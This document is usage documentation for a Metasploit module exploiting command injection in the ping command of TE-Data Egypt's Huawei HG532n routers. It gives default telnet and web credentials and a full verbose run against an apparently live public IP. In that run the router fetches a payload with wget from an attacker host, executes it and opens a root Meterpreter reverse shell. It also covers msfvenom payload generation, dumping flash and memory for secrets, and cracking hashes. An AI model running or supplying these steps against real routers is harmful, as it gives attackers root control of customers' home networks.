8.8 KiB
HG532n Command Injection Exploit
Introduction
The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the hidden ping command of their limited shell interface.
Affected hardware/software version strings:
Manufacturer: Huawei Technologies Co., Ltd.
Product Style: HG532n
SN: B7J7SB9381703791
IP: 192.168.1.1
Hardware Version: HG532EAM1HG530ERRAMVER.B
Software Version: V100R001C105B016 TEDATA
TE-Data, the incumbent ISP operator in Egypt, provided this router to customers by default. The web interface has two kinds of logins, a "limited" user:user login given to all customers, and an admin mode used by company's technical staff. For hosts within the ISP network, this web interface is remotely accessible.
The web interface's user mode provides very limited functionality – only WIFI passwords change and NAT port-forwarding. Nonetheless by port forwarding the router's own (filtered) telnet port, it becomes remotely accessible. All installed routers have a telnet password of admin:admin.
Due to the ISP's encrypted runtime router configuration [*] though, the telnet
daemon does not provide a direct linux shell. Rather a very limited custom shell
is provided instead: "ATP command line tool". The limited shell has a ping command
which falls back to the system shell though (ping %s > /var/res_ping). We exploit
that through command injection to gain Meterpreter root access.
[*] <X_ServiceManage TelnetEnable="1" ConsoleEnable="" ../> at /etc/defaultcfg.xml
Usage
With an attacker node that resides within the ISP network, do:
-
Set
payloadtolinux/mipsbe/meterpreter_reverse_tcp -
Set
RHOSTto the target router's IP -
Set
SRVHOSTto your local machine's external IP. The module starts its own HTTP server; this is the IP the exploit will use to fetch the MIPSBE payload from, through an injectedwgetcommand. Make sure this address is accessible from outside. -
Set
SRVPORTto the desired local HTTP server port number. Make sure this port is accessible from outside. -
Set
LHOSTto your machine's external IP address. A successful Reverse TCP payload will ring us back to this IP. -
Set
LPORTto an arbitrary port number that is accessible from outside networks. Metasploit will open a listener on that port and wait for the payload to connect back to us. -
Set
VERBOSEtotrueif you want to see much more verbose output (Detailed injected telnet commands output).
TE-Data firmware ships with the user:user login credentials by default.
They offer limited functionality, but they are enough for our purposes.
In case you want want to change these, set HttpUsername and HttpPassword
appropriately.
Now everything should be ready to run the exploit. Enjoy your Meterpreter session :-)
Alternatively, you can avoid hosting the payload executable from within the
module's own HTTP server and host it externally. To do so, first generate
the payload ELF executable using msfvenom:
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
No encoder or badchars specified, outputting raw payload
Payload size: 212 bytes
Final size of elf file: 296 bytes
Saved as: payload.elf
Then host the payload.elf file on an external, direct-access, web
server. Afterwards set DOWNHOST to the external server's IP address
and DOWNFIILE to the payload's path on that server. Run the exploit
afterwards.
Live Scenario (Verbose)
$ msfconsole
msf > use exploit/linux/http/huawei_hg532n_cmdinject
msf exploit(huawei_hg532n_cmdinject) > set RHOST 197.38.98.11
RHOST => 197.38.98.11
msf exploit(huawei_hg532n_cmdinject) > set SRVHOST 41.34.32.121
SRVHOST => 41.34.32.121
msf exploit(huawei_hg532n_cmdinject) > set LHOST 41.34.32.121
LHOST => 41.34.32.121
msf exploit(huawei_hg532n_cmdinject) > set VERBOSE true
VERBOSE => true
msf exploit(huawei_hg532n_cmdinject) > exploit
[*] Exploit running as background job.
msf exploit(huawei_hg532n_cmdinject) >
[-] Handler failed to bind to 41.34.32.121:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Validating router's HTTP server (197.38.98.11:80) signature
[+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposted telnet port = 33552
[*] Connecting to just-exposed telnet port 33552
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '<27><><01><>
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hostinig /MDGuEPiUDBRXD
[*] Using URL: http://0.0.0.0:8080/MDGuEPiUDBRXD
[*] Local IP: http://192.168.1.3:8080/MDGuEPiUDBRXD
[*] Runninig command on target: wget -g -v -l /tmp/zjtmztfz -r /MDGuEPiUDBRXD -P8080 41.34.32.121
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/zjtmztfz${IFS}-r${IFS}/MDGuEPiUDBRXD${IFS}-P8080${IFS}41.34.32.121;true'
[*] Received new reply token = 'ping: bad address '?''
[+] HTTP server received request. Sending payload to victim
[*] Received new reply token = 'The IP is [41.34.32.121]'
[*] Received new reply token = 'Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Runninig command on target: chmod 777 /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'
Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Runninig command on target: /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'
Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Runninig command on target: rm /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'
Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Waiting for the payload to connect back ..
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200
[+] Payload connected!
[*] Server stopped.
msf exploit(huawei_hg532n_cmdinject) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 192.168.1.1
OS : (Linux 2.6.21.5)
Architecture : mips
Meterpreter : mipsbe/linux
meterpreter >
Post-exploitation
MIPS toolchain
Beside a basic meterpreter shell, you can compile your own C programs and run them on the device! Download the Sourcery CodeBench Lite MIPS toolchain then compile your programs in the following manner:
#!/bin/bash
TOOLCHAIN_ROOT=mips-2016.05
CROSS_COMPILE=$TOOLCHAIN_ROOT/bin/mips-linux-gnu-
${CROSS_COMPILE}gcc \
--sysroot=${TOOLCHAIN_ROOT}/mips-linux-gnu/libc/uclibc/ \
-Wl,-dynamic-linker,/lib/ld-uClibc.so.0 \
-static \
program.c
${CROSS_COMPILE}strip -s a.out -o payload
Then call wget to download and run the generated payload above. Be careful
of the device's own wget call conventions below.
A special wget command
Huawei crafted their own wget implementation inside the shipped version of
busybox. It has the following syntax:
meterpreter > shell
Process 17951 created.
Channel 1 created.
wget -h
wget: invalid option -- h
BusyBox vv1.9.1 (2012-10-16 22:24:47 CST) multi-call binary
Usage: wget [OPTION]... HOST
wget download and upload a file via HTTP
Options:
-g Download
-s Upload
-v Verbose
-u Username to be used
-p Password to be used
-l Local file path
-r Remote file path
-P Port to be used, optional
-B Bind local ip, optional
-A Remote resolved ip, optional
-b Transfer start position
-e Transfer length
-m Max transfer size
-c Compress downloaded file
Rootfs image
Extract /dev/mtdblock[0123] images from the device to gain full raw access to
the flash. Use binwalk on the extracted
/dev/mtdblock3 contents to get a full squashfs rootfs image.
The most important files in the rootfs image are encrypted though. Nonetheless,
by dumping /dev/mem contents and looking for the juicy bits, you will find
all the necessary information needed ;-)
Note that even after configuration decryption, all the now-plaintext important configuration files store passwords in a SHA-256 hashed form. Be creative.